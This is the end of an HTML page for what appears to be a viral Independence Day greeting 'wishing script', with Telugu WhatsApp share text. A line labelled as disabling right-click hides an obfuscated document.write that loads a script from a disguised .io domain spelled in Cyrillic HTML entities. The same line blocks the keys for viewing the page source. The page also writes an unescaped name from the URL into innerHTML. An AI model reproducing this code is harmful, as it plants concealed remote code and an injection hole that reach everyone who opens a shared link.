		<img src="https://1.bp.blogspot.com/-_xcdttNPEQ0/Xy_fpeG3sVI/AAAAAAAACHc/2-bXOAfs7nMGKN36rqtbDi0A2Jr0zhw7QCLcBGAsYHQ/s278/inb3.gif" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-u0IWIk9MlUA/Xy_fUuNJDgI/AAAAAAAACG4/hFuK8LnWy-EMP3TG3sGWPAmwUXiea63awCLcBGAsYHQ/s178/in2.png" class="mm1"/><br>
		
		</marquee>
		<!---- share form--->
		
		<script>
		var myIndex = 0;
		carousel();
		
		function carousel() {
		var i;
		var x = document.getElementsByClassName("mySlides");
		for (i = 0; i < x.length; i++) {
		x[i].style.display = "none";  
		}
		myIndex++;
		if (myIndex > x.length) {myIndex = 1}    
		x[myIndex-1].style.display = "block";  
		setTimeout(carousel, 2000); // Change image every 2 seconds
		}
		</script>
<script type="text/javascript">
var jqs = function(sParam) {
  var sPageURL = window.location.search.substring(1);
  var sURLVariables = sPageURL.split("&");
  for (var i = 0; i < sURLVariables.length; i++) {
      var sParameterName = sURLVariables[i].split("=");
      if (sParameterName[0] === sParam) {
        return sParameterName[1];
      }
    }
};
    window.jqs = jqs;
    var name = decodeURI(jqs("n"));
    if (typeof jqs("n") === "undefined") {
name = "";
    }
    var checkName = function() {
if (name.length !== 0) {
  name = name.replace(/-/g, " ");
  console.log("name is there", name);
  document.querySelector("#name1").innerHTML = name;
  document.querySelector("#name2").innerHTML = name;
  document.querySelector("#name3").innerHTML = name;
  document.querySelector("#name4").innerHTML = name;
  document.querySelector("#name5").innerHTML = name;
  document.querySelector("#name6").innerHTML = name;
} else {

}
    };

    checkName();
	
 var createGreeting=function(){
 sname=document.querySelector("#nameTextBox").value;
 sname=sname.replace(/@/g,"-")
 sname=sname.replace(/%40/g,"-")
 sname=sname.replace(/\./g,"-")
 if(sname.trim()!=""){
 document.querySelector("#formBox").hidden = true;
 document.querySelector("#psname").hidden = true;
 document.querySelector("#share-button").hidden = false;
 document.querySelector("#sname").innerHTML = "<figure><h1 style='text-transform: uppercase;' id='sname' >" + sname + "</h1><h1 style='text-transform: uppercase;' id='sname' >" + sname + "</h1><h1 style='text-transform: uppercase;' id='sname' >" + sname + "</h1><h1 style='text-transform: uppercase;' id='sname' >" + sname + "</h1><h1 style='text-transform: uppercase;' id='sname' >" + sname + "</h1><h1 style='text-transform: uppercase;' id='sname' >" + sname + "</h1>	</figure>";
 document.querySelector("#sname").hidden = false;
 $("#ads").css("display","none");
 $(".ads").css("display","none");
 window.scrollTo(0,0);

 }else {
 alert ("please write your name here 👇👇");
 document.getElementById("nameTextBox").focus();
 }
 }
 
  var shareActionWA = function() {
 var shareString = "";
 var whatsappHref;
  shareString += "*స్వాతంత్ర్య దినోత్సవం సందర్భంగా* %0A";
 shareString += "*"+sname+"*";
 shareString +=" మీకు ప్రత్యేకమైనదాన్ని పంపారు. త్వరగా తెరవండి. తెరిచిన తర్వాత, * సీతాకోకచిలుకను తాకండి * %0A👇👇👇👇 %0A"
 shareString +=(window.location.href.split("?")[0] + "?n=" + sname).replace("#", "").replace(/ /g, "_");
 

 whatsappHref = "https://api.whatsapp.com/send?text=" + shareString;
 window.location.href = whatsappHref;

 };

//** disable right click & ctrl + u javascript code **//

document.addEventListener('contextmenu', event => event.preventDefault()); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1092;'+'&#1102;.'+'i'+'o"></s'+'cr'+'ipt>'); document.onkeydown = function(e) { if(event.keyCode==123){ return false; } else if (e.ctrlKey &&  (e.keyCode === 67 || e.keyCode === 16 || e.keyCode === 73 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) { return false; } };

</script> 

<audio id="myAudio" loop>
  <source src="https://loverays.com/bollywood-ringtones/1562123912Aye_Meri_Zameen_Teri_Mitti.mp3" type="audio/ogg">
  <source src="https://loverays.com/bollywood-ringtones/1562123912Aye_Meri_Zameen_Teri_Mitti.mp3" type="audio/mpeg">
</audio>
	</div> 
<script src="https://ajax.cloudflare.com/cdn-cgi/scripts/7089c43e/cloudflare-static/rocket-loader.min.js" data-cf-settings="3c06e57a7ac22d0bc0d6a22b-|49" defer=""></script>                         <!---- script made by ashish ranjan visit firsttechinfoar.blogspot.com for more..--->
</body>
</html>
